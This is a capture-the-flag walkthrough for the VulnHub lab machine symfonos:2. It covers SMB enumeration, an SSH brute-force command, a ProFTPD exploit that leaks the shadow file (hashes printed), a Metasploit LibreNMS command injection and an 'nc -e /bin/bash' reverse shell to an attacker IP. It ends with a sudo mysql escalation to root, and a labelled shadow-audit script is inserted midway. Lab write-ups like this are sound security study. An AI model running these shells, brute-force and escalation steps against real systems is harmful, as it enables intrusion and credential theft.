Testing symfonos:2

symfonos:2

Host network: bridged mode
Objective: obtain root
Project page: https://www.vulnhub.com/entry/symfonos-2,331/

Information gathering

[screenshot: 1.png]

```
root@kali:~# nmap -T4 -A -v -p- 192.168.31.221
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:B5:39:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.029 days (since Sat Aug 3 01:30:34 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS2<00> Flags: <unique><active>
| SYMFONOS2<03> Flags: <unique><active>
| SYMFONOS2<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2019-08-03T01:12:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-03 02:12:00
|_ start_date: N/A
```

FTP does not allow anonymous login.
Port 80 gave nothing on enumeration.

Enum4linux

It uses the SMB protocol to enumerate Windows systems and Samba services and thereby obtain a large amount of important information about the target; the results may include user accounts, group accounts, shared directories, password policies and other sensitive information (quoting Teacher Wan).
In short: Enum4linux is a tool for enumerating Windows and Samba information.

```
root@kali:~# enum4linux -a 192.168.31.221
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
```

A shared folder was found.

```
root@kali:~# smbclient //192.168.31.221/anonymous
Enter WORKGROUP\root's password: # empty password
smb: \> ls
smb: \> cd backups
smb: \> get log.txt
```

Password enumeration

This yields a user, aeolus, and port 22 (SSH) can be brute-forced:

```
hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 192.168.31.221 ssh
```

But that takes quite a long time; having seen ProFTPD 1.3.5, I believe it can also be used.

```
root@kali:~# searchsploit ProFTPD 1.3.5
```

[screenshot: 2.png]
Using this information together with the vulnerability above, the shadow file is placed in /home/aeolus/share/backups.
[screenshot: 3.png]

```
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
```

Cracking these gives aeolus:sergioteamo.
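
As an added defender-side example (not part of the original walkthrough), a small Python parser for shadow entries like the three copied out above: it splits each line into its shadow(5) fields, identifies the crypt(3) algorithm and salt, converts the last-change day count into a date, and reports the audit findings a reviewer of such a file would raise (empty passwords, legacy hash types, passwords that never expire). The sample input is the page's three lines, reproduced as they appear there; the root line is missing one trailing field, which the parser tolerates.

```python
from datetime import date, timedelta

# Constructed sample input: the three shadow entries shown on this page, copied as
# they appear there (the root line has one trailing field missing).
SHADOW_LINES = [
    "root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7::",
    "aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::",
    "cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::",
]

# crypt(3) hash-id prefixes; any other prefix is reported as "unknown".
ALGORITHMS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
STRONG = {"sha256crypt", "sha512crypt", "yescrypt"}

def parse_shadow_line(line):
    # shadow(5): name:pw:lastchg:min:max:warn:inactive:expire:reserved (9 fields)
    fields = line.rstrip("\n").split(":")
    if len(fields) < 3:
        raise ValueError("not a shadow entry: %r" % line)
    fields += [""] * (9 - len(fields))  # tolerate missing trailing fields
    name, pw, lastchg, _min, maxage = fields[:5]
    entry = {"user": name, "locked": pw.startswith(("!", "*")), "empty": pw == ""}
    if pw.startswith("$"):
        parts = pw.split("$")  # ['', id, (params for $y$,) salt, hash]
        entry["algorithm"] = ALGORITHMS.get(parts[1], "unknown")
        entry["salt"] = parts[3] if parts[1] == "y" else parts[2]
    else:
        entry["algorithm"] = "locked" if entry["locked"] else ("none" if entry["empty"] else "descrypt")
        entry["salt"] = ""
    # Field 3 is the last password change, in days since 1970-01-01.
    entry["last_change"] = date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None
    entry["max_days"] = int(maxage) if maxage else None
    return entry

def audit(entries):
    # Findings a reviewer would raise; locked accounts are skipped.
    issues = []
    for e in entries:
        if e["empty"]:
            issues.append("%s: empty password" % e["user"])
        elif not e["locked"] and e["algorithm"] not in STRONG:
            issues.append("%s: weak hash (%s)" % (e["user"], e["algorithm"]))
        if not e["locked"] and e["max_days"] in (None, 99999):
            issues.append("%s: password never expires" % e["user"])
    return issues

if __name__ == "__main__":
    for finding in audit([parse_shadow_line(l) for l in SHADOW_LINES]):
        print(finding)
```

For the three page entries the parser reports sha512crypt with last change 2019-07-18 and a max age of 99999 days, so the only finding is that none of the passwords ever expire.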

Going further as aeolus

```
λ ssh aeolus@192.168.31.221
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
```

netstat is not available, but to my pleasant surprise Nmap is:

```
aeolus@symfonos2:~$ nmap -T4 -A -v -p- 127.0.0.1
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.5-10.1.38-MariaDB-0+deb9u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.38-MariaDB-0+deb9u1
| Thread ID: 15
| Capabilities flags: 63487
8080/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-favicon: Unknown favicon MD5: B8211E9B75068FB852BFB155D9A1A2EE
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://localhost/login
```

Leave MySQL for now. Port 8080 runs another HTTP service, but it is bound to localhost only, so forward it out:

```
aeolus@symfonos2:~$ socat -d TCP-LISTEN:1234,fork,reuseaddr tcp:127.0.0.1:8080
```

Result:
[screenshot: 4.png]

Exploiting LibreNMS

LibreNMS is running on this port.
[screenshot: 5.png]
Both can be used.
Here it is loaded in msf:

```
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > show options
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.31.221
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rport 1234
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.31.30
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username aeolus
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password sergioteamo
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
python -c "import pty;pty.spawn('/bin/bash')"
cronus@symfonos2:/opt/librenms/html$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
```

I am not very comfortable with msf, so I spawn another reverse shell:

```
nc -e /bin/bash 192.168.31.35 7777
λ nc -nvlp 7777
python -c "import pty;pty.spawn('/bin/bash')"
cronus@symfonos2:/opt/librenms/html$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
```

MySQL privilege escalation

```
cronus@symfonos2:/home/cronus$ sudo -l
```

[screenshot: 6.png]
mysql can be run with root privileges:

```
cronus@symfonos2:/home/cronus$ sudo -u root mysql -e '\! /bin/sh'
# id
uid=0(root) gid=0(root) groups=0(root)
```

The lovely flag

[screenshot: 7.png]

The end

If you find any errors, please contact lanbaidetanlang@qq.com
